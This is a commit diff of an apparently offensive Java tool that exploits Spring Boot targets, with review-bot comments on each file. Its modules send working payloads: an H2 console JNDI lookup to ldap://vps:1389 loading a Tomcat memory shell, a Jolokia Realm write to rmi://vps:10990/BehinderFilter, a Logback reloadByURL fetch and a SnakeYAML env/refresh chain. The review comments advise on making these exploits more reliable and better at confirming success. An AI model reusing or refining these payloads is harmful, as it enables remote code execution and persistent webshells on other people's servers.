
Commit 2fb1dbd

committed
重定义UI
1 parent 536502f commit 2fb1dbd

18 files changed

Lines changed: 229 additions & 258 deletions

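--- a/src/main/java/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java
+++ b/src/main/java/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java
@@ -14,10 +14,28 @@
 public class H2DatabaseConsoleJNDIRCEEXP {
 
 
-public static boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps, String port,boolean version) {
-String boby = "language=en&setting=Generic+H2+(Embedded)&name=Generic+H2+(Embedded)&driver=javax.naming.InitialContext&url=ldap:/" + vps + ":" + port +"/#JNDIObject&user=&password=";
+public boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps) {
+String boby = "language=en&setting=Generic+H2+%28Server%29&name=Generic+H2+%28Server%29&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F" + vps + "%3A1389%2Fbasic%2FTomcatMemshell3&user=&password=";
+String path = H2DatabaseUtil.getJsessionid(target);
+String url = target + "/h2-console/login.do?" + path;
 
+System.out.println(url);
+boolean flag = HTTPUtils.H2PostRequest(url,boby).isOk();
+if (flag){
+return flag;
+}else {
+if (HTTPUtils.getRequest(target,"ateam").isOk()){
+return true;
+}else {
+return false;
+}
+}
 
-return false;
+}
+
+public static void main(String[] args) {
+String url = "http://127.0.0.1:9096/";
+H2DatabaseConsoleJNDIRCEEXP h2DatabaseConsoleJNDIRCEEXP= new H2DatabaseConsoleJNDIRCEEXP();
+h2DatabaseConsoleJNDIRCEEXP.hasH2DatabaseConsoleJNDIRCE(url,"127.0.0.1");
 }
 }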
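Review bot: `getJsessionid` can yield null when the console page has no session id (the same `ReUtil.hasVersion` helper is null-checked in EurekaXstreamRCEPOC), and the new `hasH2DatabaseConsoleJNDIRCE` concatenates it straight into `login.do?null` and sends the request anyway; add `if (path == null) return false;` before `url` is built. The success oracle is also loose: a 200 from login.do does not show that the JNDI lookup ran, and the fallback treats any OK answer from `target/ateam` as a confirmed shell, so a host that returns 200 for unknown paths will be reported as exploited. The listener port `1389` and the `basic/TomcatMemshell3` path are now hard-coded inside the URL-encoded string while the `port` parameter of the old signature was dropped, which also breaks any caller still passing it; consider keeping `port` as a parameter. The `System.out.println(url)` debug print should be removed or routed to the UI log.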

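--- a/src/main/java/com/drops/exp/JolokiaLogbackRCEEXP.java
+++ b/src/main/java/com/drops/exp/JolokiaLogbackRCEEXP.java
@@ -15,11 +15,11 @@
 **/
 public class JolokiaLogbackRCEEXP {
 
-public static boolean hasJolokiaLogbackRCE(String target, String vps, String port, boolean version) {
+public boolean hasJolokiaLogbackRCE(String target, String vps, String echo, boolean version) {
 
 
 String path = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/" + vps
-+ "!/example.xml";
++ ":3456!/a.xml";
 
 if (version){
 if (JolokiaUtil.hasMbeans(target)){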
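Review bot: The parameter renamed to `echo` is not used anywhere in this hunk, while the listener port `3456` and the file name `a.xml` are now baked into `path`; if `echo` was meant to carry the port, the line should read `+ ":" + echo + "!/a.xml";`, otherwise the parameter is dead. `hasJolokiaLogbackRCE` continues past the hunk, so `echo` may be consumed further down; that is worth confirming before merging. A short Javadoc stating that the target is made to fetch `http://vps:3456/a.xml` through `JMXConfigurator.reloadByURL`, and that the caller must be serving that file, would make the contract clear.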

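--- a/src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java
+++ b/src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java
@@ -13,7 +13,7 @@
 **/
 public class JolokiaRealmRCEEXP {
 
-public static boolean hasJolokiaRealmRCE(String target, String vps, String port, boolean version) {
+public boolean hasJolokiaRealmRCE(String target, String vps, String port, boolean version) {
 
 
 
@@ -35,7 +35,7 @@ public static boolean hasJolokiaRealmRCE(String target, String vps, String port,
 " \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
 " \"type\": \"WRITE\",\n" +
 " \"attribute\": \"connectionURL\",\n" +
-" \"value\": \"ldap://" + vps + ":1389/#JNDIObject\"\n" +
+" \"value\": \"rmi://" + vps + ":10990/BehinderFilter\"\n" +
 "}";
 
 String stop = "{\n" +
@@ -59,7 +59,7 @@ public static boolean hasJolokiaRealmRCE(String target, String vps, String port,
 if (JolokiaUtil.hasMbeansV3(target)){
 for (String p: poc){
 if (
-HTTPUtils.postRequestV1(target, "/jolokia").getStatus() != 200
+HTTPUtils.postRequestV1(target, "/jolokia",p).getStatus() != 200
 ){
 return false;
 }
@@ -70,8 +70,8 @@ public static boolean hasJolokiaRealmRCE(String target, String vps, String port,
 if (JolokiaUtil.hasMbeansV4(target)){
 for (String p: poc){
 if (
-HTTPUtils.postRequestV1(target, "/actuator/jolokia").getStatus() != 200
-){
+HTTPUtils.postRequestV1(target, "/actuator/jolokia",p).getStatus() != 200
+) {
 return false;
 }
 }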
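Review bot: `hasJolokiaRealmRCE` still takes `port`, but the written `connectionURL` hard-codes `:10990/BehinderFilter`, so the caller's value is silently ignored; use `" \"value\": \"rmi://" + vps + ":" + port + "/BehinderFilter\"\n" +` or remove the parameter. Passing `p` into `postRequestV1` fixes a real defect (the old calls posted no body at all), but deciding success on `getStatus() != 200` alone is weak for Jolokia, which in my experience answers HTTP 200 for most errors and reports the outcome in the JSON `status` field, so the true/false result here may not reflect whether the attribute write happened; parsing the body would make it meaningful. Switching the reference from `ldap://` to `rmi://` changes which JDK-side JNDI restrictions apply, which deserves a comment on the `value` line naming the target JDK range this is expected to work on. The method body continues outside these hunks.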

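--- a/src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java
+++ b/src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java
@@ -19,11 +19,9 @@
 **/
 public class SnakeYAMLRCEEXP {
 
-private final MainController mainController;
+private final MainController mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
 
 public SnakeYAMLRCEEXP() {
-this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
-
 }
 
 public boolean sendExp(String target, String vps, String EchoType, boolean version){
@@ -52,7 +50,7 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi
 HttpResponse re = HTTPUtils.postRequestV2(url, "actuator/env", boby2);
 if (re.isOk()) {
 HttpResponse res = HTTPUtils.postRequestV2(url,"refresh");
-if (res.isOk()){
+if (!res.isOk()){
 this.mainController.execOutputArea.appendText(Utils.log(res.body()));
 return true;
 }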
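Review bot: Inverting the check to `if (!res.isOk())` makes any non-2xx answer from the refresh call count as a successful exploit, a plain 404 included; and in this branch the request goes to `postRequestV2(url,"refresh")` while the paired env write uses `actuator/env` and `RefreshPost.isRefreshPostV2` uses `actuator/refresh`, so a 404 looks likely here. If the intent is that a triggered deserialization makes the refresh fail with a server error, post to `"actuator/refresh"` and test for that specific status (or a marker in the body) instead of `!isOk()`, and state the heuristic in a comment such as `// a 500 on refresh is taken as the payload having executed during bootstrap reload`. `sendExp` starts before this hunk.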

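--- a/src/main/java/com/drops/exp/util/EnvPost.java
+++ b/src/main/java/com/drops/exp/util/EnvPost.java
@@ -36,7 +36,7 @@ public static Boolean PostEnv(String target, String boby){
 System.out.println(boby + " 属性设置失败!");
 }
 }
-return false;
+return true;
 }
 
 public static Boolean PostEnvV2(String target, String boby){
@@ -53,7 +53,7 @@ public static Boolean PostEnvV2(String target, String boby){
 System.out.println(boby + " 属性设置失败!");
 }
 }
-return false;
+return true;
 }
 
 /**
@@ -63,19 +63,19 @@ public static Boolean PostEnvV2(String target, String boby){
 * @return:
 */
 public static boolean isPostEnv(String target){
-HttpResponse result = HTTPUtils.postRequestV1(target,"env");
-if (ResponseUtil.getStats(result) == 200){
-return true;
-}
-return false;
+// HttpResponse result = HTTPUtils.postRequestV1(target,"env");
+// if (!ResponseUtil.getBoby(result).isEmpty()){
+// return true;
+// }
+return true;
 }
 
 public static boolean isPostEnvV2(String target){
-HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/env");
-if (ResponseUtil.getStats(result) == 200){
-return true;
-}
-return false;
+// HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/env");
+// if (ResponseUtil.getStats(result) == 200){
+// return true;
+// }
+return true;
 }
 
 }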
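Review bot: `PostEnv` and `PostEnvV2` now return `true` even after the loop has printed `属性设置失败!` for a property, so a caller can no longer tell that the payload was never set on the target. Track the outcome instead: `boolean allSet = true;` before the loop, `allSet = false;` beside the failure print, and `return allSet;` at the end. `isPostEnv` and `isPostEnvV2` likewise return `true` unconditionally with their probes commented out, which means the env endpoint is never confirmed before payloads are fired; if disabling the probe was deliberate, delete the dead lines and say so in the Javadoc at line 63, otherwise restore `return ResponseUtil.getStats(result) == 200;`. The loop in each `PostEnv*` method begins before its hunk.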

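--- a/src/main/java/com/drops/exp/util/H2DatabaseUtil.java
+++ b/src/main/java/com/drops/exp/util/H2DatabaseUtil.java
@@ -1,5 +1,7 @@
 package com.drops.exp.util;
 
+import cn.hutool.http.HttpRequest;
+import cn.hutool.http.HttpResponse;
 import com.drops.utils.HTTPUtils;
 import com.drops.utils.ReUtil;
 
@@ -25,15 +27,19 @@ public static boolean hasH2Database(String target ){
 
 public static String getJsessionid(String target){
 String result = HTTPUtils.getRequest(target + "/h2-console").body();
-String regex = "login.jsp\\?jsessionid=([A-Za-z0-9]+)";
-System.out.println(result);
-System.out.println(HTTPUtils.getRequest(target + "/h2-console").getStatus());
+String regex = "jsessionid=([A-Za-z0-9]+)";
+// System.out.println(result);
+// System.out.println(HTTPUtils.getRequest(target + "/h2-console").getStatus());
 // System.out.println(ReUtil.hasVersion(result, regex));
 
 return ReUtil.hasVersion(result, regex);
 }
 
+
+
+
+
 public static void main(String[] args) {
-H2DatabaseUtil.getJsessionid("http://127.0.0.1:9095");
+H2DatabaseUtil.getJsessionid("http://127.0.0.1:9096");
 }
 }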
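Review bot: `getJsessionid` returns whatever `ReUtil.hasVersion` gives back when the relaxed `jsessionid=([A-Za-z0-9]+)` pattern does not match — EurekaXstreamRCEPOC null-checks that same helper — and the new caller in H2DatabaseConsoleJNDIRCEEXP does not handle it, so the contract should be written down: `/** Returns the jsessionid found in GET target/h2-console, or null when the page carries none. */`. Dropping the `login.jsp\?` prefix also lets the pattern match a jsessionid anywhere in the body, which is presumably intended but worth a comment. The two new hutool imports `HttpRequest`/`HttpResponse` are unused in the visible hunks, and the four blank lines added at 38-41 plus the commented-out prints should be removed rather than kept.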

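--- a/src/main/java/com/drops/exp/util/RefreshPost.java
+++ b/src/main/java/com/drops/exp/util/RefreshPost.java
@@ -15,18 +15,18 @@
 public class RefreshPost {
 
 public static boolean isRefreshPost(String target){
-HttpResponse result = HTTPUtils.postRequestV1(target,"refresh");
-if (ResponseUtil.getStats(result) == 200){
-return true;
-}
-return false;
+// HttpResponse result = HTTPUtils.postRequestV1(target,"refresh");
+// if (ResponseUtil.getStats(result) == 200){
+// return true;
+// }
+return true;
 }
 
 public static boolean isRefreshPostV2(String target){
-HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/refresh");
-if (ResponseUtil.getStats(result) == 200){
-return true;
-}
-return false;
+// HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/refresh");
+// if (ResponseUtil.getStats(result) == 200){
+// return true;
+// }
+return true;
 }
 }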
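Review bot: `isRefreshPost` and `isRefreshPostV2` now return `true` unconditionally, so the refresh endpoint is never verified before an exploit relies on it, and the original probes survive only as commented-out code. If the probe was dropped because the tool should always attempt the refresh, delete the dead lines and add a one-line Javadoc on each method, e.g. `/** Always true: the refresh endpoint is no longer probed up front; the exploit step reports its own outcome. */`; otherwise restore `return ResponseUtil.getStats(result) == 200;`. Note that sending a real POST to `/refresh` as a probe is itself a state-changing request against the target, which is a reason to keep the behaviour documented either way.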
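--- /dev/null
+++ b/src/main/java/com/drops/exp/util/VersionUtil.java
@@ -0,0 +1,32 @@
+package com.drops.exp.util;
+
+import cn.hutool.http.HttpResponse;
+import com.drops.exp.JolokiaRealmRCEEXP;
+import com.drops.utils.HTTPUtils;
+import com.drops.utils.ResponseUtil;
+
+/**
+* @ClassName: VersionUtil
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/8/9 15:53
+* @Version: v1.0.0
+* @Description:
+**/
+public class VersionUtil {
+
+
+public static boolean isVersion(String target){
+if (HTTPUtils.getRequest(target,"env").isOk()){
+return true;
+}
+return false;
+}
+
+// public static void main(String[] args) {
+// String url = "";
+// JolokiaRealmRCEEXP exp = new JolokiaRealmRCEEXP();
+// exp.hasJolokiaRealmRCE()
+// }
+
+}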
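Review bot: `isVersion` answers a yes/no question whose meaning is stated nowhere; from its use in AttackService it is the "Spring Boot 1.x" flag (`/env` reachable rather than `/actuator/env`), so the Javadoc should say `/** True when GET target/env answers OK; callers treat this as Spring Boot 1.x (actuator endpoints under / rather than /actuator). */` and the `@Description: TODO` should be filled in. A bare OK status is a weak fingerprint: an application that returns 200 for unknown paths will be classified as 1.x and receive the wrong endpoint paths for every later step, so checking the body (for example that it parses as JSON) would be more reliable. The `HttpResponse`, `JolokiaRealmRCEEXP` and `ResponseUtil` imports and the commented-out `main` are unused and should go, and the body collapses to `return HTTPUtils.getRequest(target,"env").isOk();`.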

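--- a/src/main/java/com/drops/main/AttackService.java
+++ b/src/main/java/com/drops/main/AttackService.java
@@ -1,10 +1,8 @@
 package com.drops.main;
 
 import com.drops.entity.ControllersFactory;
-import com.drops.exp.EurekaXstreamRCEEXP;
-import com.drops.exp.JolokiaLogbackRCEEXP;
-import com.drops.exp.JolokiaRealmRCEEXP;
-import com.drops.exp.SnakeYAMLRCEEXP;
+import com.drops.exp.*;
+import com.drops.exp.util.VersionUtil;
 import com.drops.poc.EurekaXstreamRCEPOC;
 import com.drops.poc.SnakeYAMLRCEPOC;
 import com.drops.poc.SpringBootInfo;
@@ -26,20 +24,23 @@
 public class AttackService {
 String target ;
 String time;
-MainController mainController ;
-SpringBootInfoCheck infoCheck;
-SpringBootInfo info = new SpringBootInfo();
+MainController mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName()); ;
+// SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
+// SpringBootInfo info = new SpringBootInfo();
 
 
 public AttackService(String targetAddressText, String httpTimeoutText) {
-this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
-this.time = httpTimeoutText;
-this.target = targetAddressText;
-this.infoCheck = new SpringBootInfoCheck();
+// this.mainController =
+// this.time = httpTimeoutText;
+// this.target = targetAddressText;
+// this.infoCheck = new SpringBootInfoCheck();
 }
 
 public boolean gadgetSend(String target, String vps, String gadget, String echo){
-boolean flag = infoCheck.isSpringbootVersionV1();
+SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
+boolean flag = VersionUtil.isVersion(target);
+// boolean flag = true;
+// String type = "inje"
 String env = "/env";
 String env2 = "/actuator/env";
 System.out.println(target);
@@ -53,34 +54,41 @@ public boolean gadgetSend(String target, String vps, String gadget, String echo)
 SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
 return exp.sendExp(target,vps,echo,flag);
 }else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
-EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
-// return exp.
+EurekaXstreamRCEPOC exp = new EurekaXstreamRCEPOC();
+exp.hasEurekaXstreamRCE(target);
+return false;
 }else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
 JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
+return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,echo,flag);
 
 }else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
 JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
-
+return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,echo,flag);
 }else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
-
-
+H2DatabaseConsoleJNDIRCEEXP exp = new H2DatabaseConsoleJNDIRCEEXP();
+return exp.hasH2DatabaseConsoleJNDIRCE(target, vps);
 }
 
 }else {
 if (gadget.equalsIgnoreCase("SnakeYAMLRCE")) {
 SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
 return exp.sendExp(target,vps,echo,flag);
 }else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
-EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
-// return exp.
+EurekaXstreamRCEPOC exp = new EurekaXstreamRCEPOC();
+exp.hasEurekaXstreamRCE(target);
+return false;
 }else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
 JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
+return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,echo,flag);
 
 }else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
 JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
+return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,echo,flag);
 
-}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
 
+}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
+H2DatabaseConsoleJNDIRCEEXP exp = new H2DatabaseConsoleJNDIRCEEXP();
+return exp.hasH2DatabaseConsoleJNDIRCE(target, vps);
 
 }
 }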
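Review bot: The constructor now discards both `targetAddressText` and `httpTimeoutText`, so `this.target` and `this.time` stay null and the HTTP timeout the user enters never reaches any request; keep `this.time = httpTimeoutText;` and `this.target = targetAddressText;` (or remove the fields and parameters together) instead of commenting them out. In `gadgetSend` the new `SpringBootInfoCheck infoCheck` is created and never read, both `EurekaXstreamRCE` branches throw away the result of `hasEurekaXstreamRCE` and return false regardless, and `echo` is handed to `hasJolokiaRealmRCE` in its `port` slot, which only works because that method ignores `port`. The `mainController` initializer also carries a stray trailing `;`, and `import com.drops.exp.*;` replaces four explicit imports with a wildcard. `gadgetSend` continues past the last hunk.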

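--- a/src/main/java/com/drops/poc/EurekaXstreamRCEPOC.java
+++ b/src/main/java/com/drops/poc/EurekaXstreamRCEPOC.java
@@ -35,21 +35,23 @@ public boolean hasEurekaXstreamRCE(String target) {
 String version = "eureka-client-1.8.7";
 // this.mainController.logTextArea.appendText(Utils.log("正在验证是否存在依赖spring-boot-starter-actuator以及 eureka-client 版本 < 1.8.7!"));
 if (context.contains("spring-boot-starter-actuator")){
-this.mainController.logTextArea.appendText(Utils.log("存在依赖:spring-boot-starter-actuator"));
+// this.mainController.logTextArea.appendText(Utils.log("存在依赖:spring-boot-starter-actuator"));
 String result = ReUtil.hasVersion(context,regex);
 if (result != null){
 if (result.compareToIgnoreCase(version) >= 0){
 this.mainController.logTextArea.appendText(Utils.log("依赖版本不符合,版本为:" + result));
 }else {
 this.mainController.logTextArea.appendText(Utils.log("依赖版本:" + result));
+this.mainController.logTextArea.appendText(Utils.log("暂不支持eureka xstream deserialization RCE 利用! "));
+this.mainController.logTextArea.appendText(Utils.log("请手动利用! "));
 return true;
 }
 }else {
-this.mainController.logTextArea.appendText(Utils.log("eureka-client 依赖不存在!"));
+// this.mainController.logTextArea.appendText(Utils.log("eureka-client 依赖不存在!"));
 }
 
 }else{
-this.mainController.logTextArea.appendText(Utils.log("spring-boot-starter-actuator 依赖不存在!"));
+// this.mainController.logTextArea.appendText(Utils.log("spring-boot-starter-actuator 依赖不存在!"));
 return false;
 }
 return false;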
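Review bot: Commenting out the three negative-path log lines leaves `hasEurekaXstreamRCE` returning false with no message when actuator or eureka-client is absent, so the user cannot tell "not vulnerable" from "probe found nothing"; keep a short log in those branches or surface the reason some other way. The two new messages at 45-46 sit directly above `return true`, which makes a true result mean "vulnerable but this tool will not exploit it"; a comment such as `// reported as vulnerable; exploitation must be done by hand` above them, and the same in the method's Javadoc, would make that explicit to callers like AttackService that discard the value. Separately, the surrounding `compareToIgnoreCase` test compares version strings lexicographically, so a multi-digit component such as 1.10.x would sort below 1.8.7 and be reported vulnerable; that line is unchanged here but worth a look. The method begins before this hunk.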
